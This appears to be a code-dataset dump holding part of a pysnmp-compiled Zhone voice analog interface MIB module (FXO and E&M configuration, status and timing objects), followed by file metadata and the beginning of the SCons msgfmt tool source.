zhoneVaIfFXOCfgSupDisconnect = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 3), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSupDisconnect.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgSupDisconnect.setDescription(" Specifies whether a supervisory disconnect signal (CPC) will be presented to the interface when the connected party at the interface hangs up. The default value of this object is 'true'. ")
zhoneVaIfFXOCfgDialType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("dtmf", 1), ("pulse", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOCfgDialType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOCfgDialType.setDescription('Specifies the out dialing type of FXO interface. dtmf - DTMF digit. pulse - pulse. The default value of this object is dtmf(1). ')
zhoneVaIfFXOStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2), )
if mibBuilder.loadTexts: zhoneVaIfFXOStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOStatusTable.setDescription('The Foreign Exchange Office (FXO) interface Status Table. It contains hook status, ring detection and other states of the interface. ')
zhoneVaIfFXOStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1), )
zhoneVaIfFXOCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXOStatusEntry"))
zhoneVaIfFXOStatusEntry.setIndexNames(*zhoneVaIfFXOCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXOStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOStatusEntry.setDescription('An entry in the status table for each FXO interface. ')
zhoneVaIfFXOHookStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("onHook", 1), ("offHook", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXOHookStatus.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOHookStatus.setDescription('This object contains the hook status of FXO interface. onHook - Present the onHook to the connected equipment. offHook - Present the offHook to the connected equipment. ')
zhoneVaIfFXORingDetect = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 2), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXORingDetect.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXORingDetect.setDescription("This object contains the ring detect indication. If the value is true, then the interface detects ring from PBX or CO; otherwise, it doesn't.")
zhoneVaIfFXORingGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 3), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXORingGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXORingGround.setDescription("This object contains the incoming ring ground indication. It is only valid when the zvaIfFXOCfgSignalType is fxoGroundStart. If the object is true, then the interface is presenting a ring ground to the connected equipment; otherwise, it doesn't. ")
zhoneVaIfFXOTipGround = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 2, 1, 4), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfFXOTipGround.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTipGround.setDescription("This object contains the incoming tip ground indication. It is only valid when the zvaIfFXOCfgSignalType is fxoGroundStart. If the object is true, then the interface is detecting a tip ground at the interface; otherwise, it doesn't. ")
zhoneVaIfFXOTimingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3), )
if mibBuilder.loadTexts: zhoneVaIfFXOTimingTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingTable.setDescription('The FXO interface Timing Parameters table. It contains the configuration of the various FXO signaling protocol timing parameters. ')
zhoneVaIfFXOTimingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1), )
zhoneVaIfFXOCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfFXOTimingEntry"))
zhoneVaIfFXOTimingEntry.setIndexNames(*zhoneVaIfFXOCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfFXOTimingEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingEntry.setDescription('An entry in the FXO Timing Parameters Table for each FXO interface.')
zhoneVaIfFXOTimingDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingDigitDuration.setDescription('Outgoing DTMF digit duration in milliseconds. The default value of this object is 100 msec. ')
zhoneVaIfFXOTimingInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingInterDigitDuration.setDescription('Outgoing DTMF inter-digit duration in milliseconds. The default value of this object is 100 msec. ')
zhoneVaIfFXOTimingPulseRate = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 20))).setUnits('pps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseRate.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseRate.setDescription('Outgoing pulse dialing rate in pulses per second (pps). The default value of this object is 10 pps. ')
zhoneVaIfFXOTimingPulseInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 3, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 1000))).setUnits('pps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfFXOTimingPulseInterDigitDuration.setDescription('Outgoing pulse dialing inter-digit timing in milliseconds. The default value of this object is 500 milliseconds. ')
zhoneVaIfEMObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4))
zhoneVaIfEMCfgTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1), )
if mibBuilder.loadTexts: zhoneVaIfEMCfgTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgTable.setDescription('The E&M standard configuration table. It contains the current setting of E&M configurable parameters. ')
zhoneVaIfEMCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: zhoneVaIfEMCfgEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgEntry.setDescription('An entry in the standard configuration table for each E&M tie trunk interface.')
zhoneVaIfEMCfgSignalType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("winkStart", 1), ("immediateDial", 2), ("delayDial", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMCfgSignalType.setReference('EIA/TIA-464B: Sections 4.1.3.4.1 Signaling Protocols. ')
if mibBuilder.loadTexts: zhoneVaIfEMCfgSignalType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgSignalType.setDescription("The signaling type of E&M tie trunk interface. winkStart - the calling side seizes the line by going off-hook on its E lead but waits for a short off-hook 'wink' indication on its M lead from the called side before sending address information as DTMF digits. immediateDial - the calling side seizes the line by going off-hook on its E lead and sends address information as DTMF digits. delayDial - the calling side seizes the line by going off-hook on its E lead. After a timing interval, the calling side looks at the supervision from the called side. If the supervision is on-hook, the calling side starts sending information as DTMF digits; otherwise, the calling side waits until the called side goes on-hook and then starts sending address information. The default value of this object is winkStart(1). ")
zhoneVaIfEMCfgOperation = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("twoWires", 1), ("fourWires", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMCfgOperation.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgOperation.setDescription('Specify the operation of the E&M signal. twoWires - 2-wire operation. fourWires - 4-wire operation. The default value of this object is twoWires(1). ')
zhoneVaIfEMCfgType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8))).clone(namedValues=NamedValues(("typeI", 1), ("typeII", 2), ("typeIII", 3), ("typeIV", 4), ("typeV", 5), ("typeIIE", 6), ("typeIIM", 7), ("typeTO", 8)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMCfgType.setReference('EIA/TIA-464B: Sections 4.2.3 E&M Lead Signaling. ')
if mibBuilder.loadTexts: zhoneVaIfEMCfgType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgType.setDescription('Specifies the E&M Lead Signaling type. LEGEND: V = -48V /\\/\\/ = detector/resister X = normally open relay contact + = normally closed relay contact G = ground SB = Signal Battery SG = Signal Ground typeI - Leads: E (output, relay to ground) M (input, referenced to ground) The tie line equipment (switch/router/etc) generates the E-signal to the PBX type grounding the E-lead. The tie line equipment detects the M-signal by detecting current flow to ground. A common ground must exist between the line equipment and the PBX. PBX | TIE LINE | E: V--/\\/\\/---|-----X----G | M: V----X-----|---/\\/\\/--G typeII - Leads: E (output, relay to SG) M (input, referenced to ground) SB (feed for M, connected to -48V) SG (return for E, galvanically isolated from ground) This interface requires no common ground between the equipment, thus avoiding ground loop noise problems. E-signal is generated toward the PBX by connecting it to SG. M-signal is indicated by the PBX connecting it to SB. While this interface does NOT require a common ground, it does have the tendency to inject noise into the audio paths since it is asymmetrical with respect to current flow between devices. PBX | TIE LINE | E: V--/\\/\\/---|-----X---- | | SG: G----------|---------- | M: ----X-----|---/\\/\\/--G | | SB: ----------|----------V typeIII - Leads: E (output, relay to ground) M (input, referenced to ground) SB (connected to -48V) SG (connected to ground) This interface operates similar to type I with respect to the E-signal. The M-signal, however, is indicated by the PBX connecting it to SB on assertion, and alternately connecting it to SG during inactivity. Unfortunately, a common ground must be shared between the equipment. PBX | TIE LINE | E: V--/\\/\\/---|-----X----G | SG: ----------|----------G + | M: ----------|---/\\/\\/--G X | SB: ----------|----------V typeIV - Leads: E (output, relay to SG) M (input, referenced to -48V) SB (feed for M, connected to ground) SG (return for E, galvanically isolated from ground) This interface is fully symmetrical; it does not require a common ground, does not inject noise into audio paths, and can be connected back to back by swapping E/SG for M/SB. E-signal is indicated to the PBX by connecting it to SG. M-signal is provided by the PBX connecting it to SB. PBX | TIE LINE | E: V--/\\/\\/---|-----X---- | | SG: G----------|---------- | M: ----------|---/\\/\\/--V X | SB: ----------|----------G typeV - Leads: E (output, relay to ground) M (input, referenced to -48V) Type V line equipment indicates E-signal to the PBX by grounding the E-lead. The PBX indicates M-signal by grounding the M-lead. This interface does require a common ground, but does allow back to back connections by swapping E for M. This interface is quasi-symmetric in that while the line is up, current flow is more or less equal between the PBX and line equipment. But noise injection is still a problem. PBX | TIE LINE | E: V--/\\/\\/---|-----X----G | M: G-----X----|---/\\/\\/--V | The default value of this object is typeI(1). ')
zhoneVaIfEMCfgDialType = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("dtmf", 1), ("pulse", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMCfgDialType.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMCfgDialType.setDescription('Specifies the out dialing type of E&M interface. dtmf - DTMF digit. pulse - pulse. The default value of this object is dtmf(1). ')
zhoneVaIfEMStatusTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2), )
if mibBuilder.loadTexts: zhoneVaIfEMStatusTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMStatusTable.setDescription('The E&M interface Table. The table contains the status of the E&M tie trunk interface. ')
zhoneVaIfEMStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2, 1), )
zhoneVaIfEMCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfEMStatusEntry"))
zhoneVaIfEMStatusEntry.setIndexNames(*zhoneVaIfEMCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfEMStatusEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMStatusEntry.setDescription('An entry in the status table for each E&M interface. ')
zhoneVaIfEMInSeizureActive = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2, 1, 1), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMInSeizureActive.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMInSeizureActive.setDescription("This object contains the incoming seizure state of the E&M interface. If the value is true, then the interface has an incoming trunk seizure active; otherwise, it doesn't. ")
zhoneVaIfEMOutSeizureActive = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 2, 1, 2), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneVaIfEMOutSeizureActive.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMOutSeizureActive.setDescription("This object contains the outgoing seizure state of the E&M interface. If the value is true, then the interface has an outgoing trunk seizure active; otherwise, it doesn't. ")
zhoneVaIfEMTimingTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3), )
if mibBuilder.loadTexts: zhoneVaIfEMTimingTable.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingTable.setDescription('The E&M tie trunk Timing Parameters table. It contains the configuration of the various E&M signaling protocol timing parameters. ')
zhoneVaIfEMTimingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1), )
zhoneVaIfEMCfgEntry.registerAugmentions(("Zhone-VOICE-ANALOG-IF-MIB", "zhoneVaIfEMTimingEntry"))
zhoneVaIfEMTimingEntry.setIndexNames(*zhoneVaIfEMCfgEntry.getIndexNames())
if mibBuilder.loadTexts: zhoneVaIfEMTimingEntry.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingEntry.setDescription('An entry in the E&M Timing Parameters Table for each E&M interface.')
zhoneVaIfEMTimingDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingDigitDuration.setDescription('Outgoing DTMF digit duration in milliseconds. The default value of this object is 100 milliseconds. ')
zhoneVaIfEMTimingInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(50, 500))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingInterDigitDuration.setDescription('Outgoing DTMF inter-digit duration in milliseconds. The default value of this object is 100 milliseconds. ')
zhoneVaIfEMTimingPulseRate = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 20))).setUnits('pps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseRate.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseRate.setDescription('Outgoing pulse dialing rate in pulses per second (pps). The default value of this object is 10 pps. ')
zhoneVaIfEMTimingPulseInterDigitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 1000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseInterDigitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingPulseInterDigitDuration.setDescription('Outgoing Pulse dialing inter-digit timing in milliseconds. The default value of this object is 500 milliseconds. ')
zhoneVaIfEMTimingClearWaitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(200, 2000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingClearWaitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingClearWaitDuration.setDescription('Time of Inactive seizure signal to declare call cleared. The default value of this object is 400 milliseconds.')
zhoneVaIfEMTimingMaxWinkWaitDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 5000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkWaitDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkWaitDuration.setDescription('Maximum time to wait from the outgoing seizure of the line to the time of sending out a wink-pulse. The default value of this object is 200 milliseconds.')
zhoneVaIfEMTimingMaxWinkDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 3000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxWinkDuration.setDescription('Maximum outgoing wink duration (between the wink-pulse leading edge and trailing edge) for wink start signaling. The default value of this object is 200 milliseconds.')
zhoneVaIfEMTimingDelayStart = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(20, 2000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingDelayStart.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingDelayStart.setDescription('Minimum time to wait from outgoing seizure to out-dialing digits for delay start signaling. The default value of this object is 300 milliseconds. ')
zhoneVaIfEMTimingMaxDelayDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 5000))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxDelayDuration.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMaxDelayDuration.setDescription('Maximum time to wait from outgoing seizure to out-dialing digits. If the far end does not allow sending digits within the duration specified in this object, a reorder tone will be sent to the calling party. The default value of this object is 2000 milliseconds.')
zhoneVaIfEMTimingMinDelayPulseWidth = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 5, 6, 4, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(140, 5000), ))).setUnits('milliseconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: zhoneVaIfEMTimingMinDelayPulseWidth.setStatus('current')
if mibBuilder.loadTexts: zhoneVaIfEMTimingMinDelayPulseWidth.setDescription('Minimum delay-dial pulse duration for incoming call. If the value of this object is 0, then no delay-dial is sent to the far end for the incoming call. The default value of this object is 140 milliseconds.')
mibBuilder.exportSymbols("Zhone-VOICE-ANALOG-IF-MIB", zhoneVaIfFXSCfgSignalType=zhoneVaIfFXSCfgSignalType, zhoneVaIfFXOCfgDialType=zhoneVaIfFXOCfgDialType, zhonePotsRingRowStatus=zhonePotsRingRowStatus, zhoneVaIfCfgReceiveTLPNum=zhoneVaIfCfgReceiveTLPNum, zhoneVaIfCfgImpedance=zhoneVaIfCfgImpedance, zhonePotsRingEntry=zhonePotsRingEntry, zhoneVaIfFXOTimingInterDigitDuration=zhoneVaIfFXOTimingInterDigitDuration, zhoneVaIfEMTimingTable=zhoneVaIfEMTimingTable, zhoneVoiceAnalogIf_MIB=zhoneVoiceAnalogIf_MIB, zhonePotsRingTimer=zhonePotsRingTimer, zhoneVaIfFXOCfgSupDisconnect=zhoneVaIfFXOCfgSupDisconnect, zhoneVaIfEMTimingPulseInterDigitDuration=zhoneVaIfEMTimingPulseInterDigitDuration, zhoneVaIfEMCfgType=zhoneVaIfEMCfgType, zhoneVaIfEMCfgSignalType=zhoneVaIfEMCfgSignalType, zhoneVaIfFXOTimingEntry=zhoneVaIfFXOTimingEntry, zhoneVaIfEMCfgDialType=zhoneVaIfEMCfgDialType, zhoneVaIfEMTimingMaxDelayDuration=zhoneVaIfEMTimingMaxDelayDuration, zhoneVaIfEMTimingClearWaitDuration=zhoneVaIfEMTimingClearWaitDuration, zhoneVaIfFXSTimingDigitDuration=zhoneVaIfFXSTimingDigitDuration, zhoneVaIfFXSObjects=zhoneVaIfFXSObjects, zhoneVaIfFXOHookStatus=zhoneVaIfFXOHookStatus, zhoneVaIfEMTimingEntry=zhoneVaIfEMTimingEntry, zhoneVaIfEMCfgEntry=zhoneVaIfEMCfgEntry, zhoneVaIfEMStatusEntry=zhoneVaIfEMStatusEntry, zhoneVaIfCfgReceiveTLP=zhoneVaIfCfgReceiveTLP, zhoneVaIfFXOStatusEntry=zhoneVaIfFXOStatusEntry, zhoneVaIfStatusInfoType=zhoneVaIfStatusInfoType, zhoneVaIfCfgTransmitTLP=zhoneVaIfCfgTransmitTLP, zhoneVaIfStatusTable=zhoneVaIfStatusTable, zhoneVaIfGeneralObjects=zhoneVaIfGeneralObjects, zhoneVaIfFXSTimingInterDigitDuration=zhoneVaIfFXSTimingInterDigitDuration, zhoneVaIfCfgLoopCurrent=zhoneVaIfCfgLoopCurrent, zhoneVaIfEMCfgTable=zhoneVaIfEMCfgTable, zhoneVaIfFXSStatusTable=zhoneVaIfFXSStatusTable, zhoneVaIfCfgTrunkConditioning=zhoneVaIfCfgTrunkConditioning, zhoneVaIfCfgMaintenanceMode=zhoneVaIfCfgMaintenanceMode, zhoneVaIfEMOutSeizureActive=zhoneVaIfEMOutSeizureActive, zhoneVaIfCfgTable=zhoneVaIfCfgTable, zhoneVaIfFXOCfgNumberRings=zhoneVaIfFXOCfgNumberRings, zhoneVaIfFXSTimingTable=zhoneVaIfFXSTimingTable, zhoneVaIfFXOStatusTable=zhoneVaIfFXOStatusTable, zhoneVaIfEMObjects=zhoneVaIfEMObjects, zhonePotsRingTable=zhonePotsRingTable, zhoneVaIfStatusSignalErrors=zhoneVaIfStatusSignalErrors, zhoneVaIfFXSRingBack=zhoneVaIfFXSRingBack, zhoneVaIfEMStatusTable=zhoneVaIfEMStatusTable, zhoneVaIfFXOCfgSignalType=zhoneVaIfFXOCfgSignalType, zhoneVaIfFXORingGround=zhoneVaIfFXORingGround, PYSNMP_MODULE_ID=zhoneVoiceAnalogIf_MIB, zhoneVaIfObjects=zhoneVaIfObjects, zhoneVaIfFXSStatusEntry=zhoneVaIfFXSStatusEntry, zhoneVaIfFXORingDetect=zhoneVaIfFXORingDetect, zhoneVaIfEMTimingPulseRate=zhoneVaIfEMTimingPulseRate, zhoneVaIfFXSTipGround=zhoneVaIfFXSTipGround, zhoneVaIfFXOTimingPulseInterDigitDuration=zhoneVaIfFXOTimingPulseInterDigitDuration, zhoneVaIfCfgRingVoltage=zhoneVaIfCfgRingVoltage, zhoneVaIfEMTimingMaxWinkWaitDuration=zhoneVaIfEMTimingMaxWinkWaitDuration, zhoneVaIfFXOTimingDigitDuration=zhoneVaIfFXOTimingDigitDuration, zhoneVaIfCfgLineCapabilities=zhoneVaIfCfgLineCapabilities, zhoneVaIfFXSHookStatus=zhoneVaIfFXSHookStatus, zhoneVaIfEMTimingInterDigitDuration=zhoneVaIfEMTimingInterDigitDuration, zhoneVaIfFXSRingActive=zhoneVaIfFXSRingActive, zhoneVaIfCfgLineType=zhoneVaIfCfgLineType, zhoneVaIfFXOCfgEntry=zhoneVaIfFXOCfgEntry, zhoneVaIfEMTimingDigitDuration=zhoneVaIfEMTimingDigitDuration, zhoneVaIfEMTimingMaxWinkDuration=zhoneVaIfEMTimingMaxWinkDuration, zhoneVaIfEMCfgOperation=zhoneVaIfEMCfgOperation, 
zhoneVaIfFXSRingGround=zhoneVaIfFXSRingGround, zhoneVaIfFXOObjects=zhoneVaIfFXOObjects, zhoneVaIfCfgTransmitTLPNum=zhoneVaIfCfgTransmitTLPNum, zhoneVaIfFXSTimingEntry=zhoneVaIfFXSTimingEntry, zhonePotsRingIfIndex=zhonePotsRingIfIndex, zhoneVaIfCfgPCMEncoding=zhoneVaIfCfgPCMEncoding, zhonePotsRingRingingCadence=zhonePotsRingRingingCadence, zhoneVaIfEMInSeizureActive=zhoneVaIfEMInSeizureActive, zhoneVaIfEMTimingDelayStart=zhoneVaIfEMTimingDelayStart, zhoneVaIfCfgIntegratedDSP=zhoneVaIfCfgIntegratedDSP, zhoneVaIfFXOCfgTable=zhoneVaIfFXOCfgTable, zhoneVaIfCfgEntry=zhoneVaIfCfgEntry, zhoneVaIfFXSCfgEntry=zhoneVaIfFXSCfgEntry, zhoneVaIfFXSRingFrequency=zhoneVaIfFXSRingFrequency, zhoneVaIfFXSCfgTable=zhoneVaIfFXSCfgTable, zhoneVaIfFXOTimingPulseRate=zhoneVaIfFXOTimingPulseRate, zhoneVaIfEMTimingMinDelayPulseWidth=zhoneVaIfEMTimingMinDelayPulseWidth, zhoneVaIfFXOTimingTable=zhoneVaIfFXOTimingTable, zhoneVaIfStatusEntry=zhoneVaIfStatusEntry, zhoneVaIfFXOTipGround=zhoneVaIfFXOTipGround)
| 186.756944
| 4,522
| 0.783773
|
84d3becf658cef2d01c5c865af4daf00bf09b779
| 4,389
|
py
|
Python
|
engine/SCons/Tool/msgfmt.py
|
unix1986/scons
|
2137aa513182619fe50fcb89a248aafbfacf5653
|
[
"MIT"
] | 9
|
2016-05-10T01:51:28.000Z
|
2022-03-18T10:14:32.000Z
|
engine/SCons/Tool/msgfmt.py
|
unix1986/scons
|
2137aa513182619fe50fcb89a248aafbfacf5653
|
[
"MIT"
] | 1
|
2016-05-10T17:00:54.000Z
|
2016-05-10T19:33:11.000Z
|
engine/SCons/Tool/msgfmt.py
|
unix1986/scons
|
2137aa513182619fe50fcb89a248aafbfacf5653
|
[
"MIT"
] | 3
|
2015-05-15T19:54:57.000Z
|
2021-04-12T15:25:56.000Z
|
""" msgfmt tool """
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Tool/msgfmt.py 2014/09/27 12:51:43 garyo"
from SCons.Builder import BuilderBase
#############################################################################
class _MOFileBuilder(BuilderBase):
""" The builder class for `MO` files.
  The reason for this builder to exist, and its purpose, is quite similar
  to that of `_POFileBuilder`. This time, we extend the list of sources, not targets,
and call `BuilderBase._execute()` only once (as we assume single-target
here).
"""
def _execute(self, env, target, source, *args, **kw):
    # Here we add support for the 'LINGUAS_FILE' keyword. An emitter is not
    # suitable in this case, as it is called too late (after multiple sources
    # are handled by the single_source builder).
import SCons.Util
from SCons.Tool.GettextCommon import _read_linguas_from_files
linguas_files = None
    if 'LINGUAS_FILE' in env and env['LINGUAS_FILE'] is not None:
